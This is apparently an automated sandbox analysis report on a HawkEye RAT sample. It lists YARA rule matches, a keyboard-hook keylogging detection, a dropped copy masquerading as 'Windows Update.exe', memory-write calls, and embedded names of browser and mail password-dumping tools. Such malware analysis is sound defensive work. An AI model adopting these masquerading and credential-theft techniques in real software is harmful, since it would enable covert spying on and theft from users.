                          Source: Yara matchFile source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Windows Update.exe PID: 2360, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Sample_B.exe PID: 2368, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPE
                          Contains functionality to log keystrokes (.Net Source)Show sources
                          Source: Sample_B.exe, Form1.cs.Net Code: HookKeyboard
                          Source: Windows Update.exe.0.dr, Form1.cs.Net Code: HookKeyboard
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                          Source: WindowsUpdate.exe.2.dr, Form1.cs.Net Code: HookKeyboard
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, Form1.cs.Net Code: HookKeyboard
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, Form1.cs.Net Code: HookKeyboard
                          Installs a global keyboard hookShow sources
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\Windows Update.exeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary:

                          barindex
                          Malicious sample detected (through community Yara rule)Show sources
                          Source: Sample_B.exe, type: SAMPLEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: Sample_B.exe, type: SAMPLEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000002.00000002.2111753690.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000002.00000000.2075201287.0000000000EE2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000002.00000003.2082749506.00000000054A9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000000.00000000.2069232329.0000000000BC2000.00000020.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 00000002.00000002.2111820758.0000000002371000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.2.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.0.Sample_B.exe.bc0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.2.Windows Update.exe.ee0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.0.Sample_B.exe.bc8208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.0.Windows Update.exe.ee0000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.2.Windows Update.exe.f3fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.2.Windows Update.exe.ee9c0d.4.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.2.Sample_B.exe.bc9c0d.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.3.Windows Update.exe.54aec22.0.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.0.Sample_B.exe.bc9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.0.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.2.Sample_B.exe.c1fa72.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.0.Windows Update.exe.ee8208.2.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.0.Windows Update.exe.f3fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.2.Windows Update.exe.ee8208.3.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 0.2.Sample_B.exe.bc8208.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.0.Windows Update.exe.ee9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                          Source: 2.2.Windows Update.exe.2392140.5.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                          Source: C:\Users\user\Desktop\Sample_B.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                          Source: C:\Users\user\Desktop\Sample_B.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00646A6A NtResumeThread,2_2_00646A6A
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00645172 NtQuerySystemInformation,2_2_00645172
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00646B12 NtWriteVirtualMemory,2_2_00646B12
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00646AE5 NtWriteVirtualMemory,2_2_00646AE5
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00645145 NtQuerySystemInformation,2_2_00645145
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BCD4260_2_00BCD426
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BDD5AE0_2_00BDD5AE
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BCD5230_2_00BCD523
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BCD6C40_2_00BCD6C4
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BD76460_2_00BD7646
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C06AF40_2_00C06AF4
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C2ABFC0_2_00C2ABFC
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C23CBE0_2_00C23CBE
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C23C4D0_2_00C23C4D
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C23DC00_2_00C23DC0
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BCED030_2_00BCED03
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00C23D2F0_2_00C23D2F
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BDAFA60_2_00BDAFA6
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BCCF920_2_00BCCF92
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00551DB80_2_00551DB8
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: 0_2_00BFC7BC0_2_00BFC7BC
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F103C02_2_00F103C0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EED4262_2_00EED426
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EFD5AE2_2_00EFD5AE
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EED5232_2_00EED523
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EED6C42_2_00EED6C4
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EF76462_2_00EF7646
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F229BE2_2_00F229BE
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F26AF42_2_00F26AF4
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F4ABFC2_2_00F4ABFC
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F43CBE2_2_00F43CBE
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F43C4D2_2_00F43C4D
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F43DC02_2_00F43DC0
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F43D2F2_2_00F43D2F
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EEED032_2_00EEED03
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EFAFA62_2_00EFAFA6
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00EECF922_2_00EECF92
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_001A638C2_2_001A638C
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_004E60682_2_004E6068
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_004E72002_2_004E7200
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_004E8A902_2_004E8A90
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_004E57782_2_004E5778
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_004E8DE82_2_004E8DE8
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 2_2_00F1C7BC2_2_00F1C7BC
                          Source: C:\Users\user\Desktop\Sample_B.exeCode function: String function: 00C0BA9D appears 36 times
                          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: String function: 00F2BA9D appears 36 times
                          Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 1708
                          Source: Sample_B.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Sample_B.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Sample_B.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Windows Update.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: WindowsUpdate.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: WindowsUpdate.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: WindowsUpdate.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                          Source: Sample_B.exeBinary or memory string: OriginalFilename vs Sample_B.exe
                          Source: Sample_B.exeBinary or memory string: OriginalFileName vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2076206862.0000000000BC2000.00000020.00020000.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewersvcj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewbengine.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepuiapi.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWfsR.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmplayer.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsfltr32.acm.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaudiosrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebatt.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMDMINST.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWCNCSVC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamePOWRPROF.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAUTOPLAY.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamedmdskres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamegpscript.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesdcpl.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesrchadmin.dll.mui@ vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPDSp.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameVfWWDM32.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUsbui.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameERCj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamecscsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameehRecvr.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamessdpsrv.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXE.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetcfgx.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsfeedsbs.dll.muiD vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameunregmp2.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWUDFSvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameWPCCPL.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameTrustedInstaller.exe.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameUxTheme.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenetprof.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamebattc.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewevtsvc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameappmgmts.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamesti_ci.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamefaultrep.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewdc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameqwavedrv.sys.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewucltux.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameunpnhost.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameappinfo.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemidimap.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemmcndmgr.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameAccessibilityCpl.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameMSRATING.DLL.MUID vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameoleres.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmploc.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameACCTRES.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameOLEACCRC.DLL.MUIj% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameIPBusEnum.dll.muij% vs Sample_B.exe
                          Source: Sample_B.exe, 00000000.00000002.2078561268.0000000005C17000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamerstrui.exe.muij% vs Sample_B.exe
